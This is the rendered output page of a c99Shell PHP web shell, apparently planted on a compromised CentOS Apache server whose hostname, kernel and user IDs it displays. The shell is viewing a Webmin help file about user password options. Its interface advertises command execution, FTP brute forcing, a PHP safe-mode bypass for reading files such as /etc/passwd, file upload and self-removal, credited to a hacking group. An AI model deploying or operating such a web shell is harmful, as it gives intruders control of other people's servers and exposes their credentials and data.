!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/useradmin/help/   drwxr-xr-x
Free 53.75 GB of 127.8 GB (42.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pass.no.UTF-8.html (1.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Passord
Når en bruker logger inn via telnet eller på konsollet, må han/hun vanligvis oppgi et passord. Det er fire mulige valg for passordet:
  • Spør ved første innlogging
    When the user logs in for the first time via telnet or at the console in text mode, the system will prompt the user for his password.

  • No password required
    The user can login to the system without providing a password. This option should be used with care.

  • No login allowed
    If this option is chosen the user will not be able to login to the system at all, even to read mail using POP3 server.

  • Encrypted password
    Unix passwords are stored in a one-way encrypted form. This option allows you to enter the password for a user as an encrypted string (maybe taken from the password file on another system).

  • Clear text password
    To set the password for a user, select this option and enter it into the text field. Webmin will take the password you enter, encrypt it and store it in the password file.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0103 ]--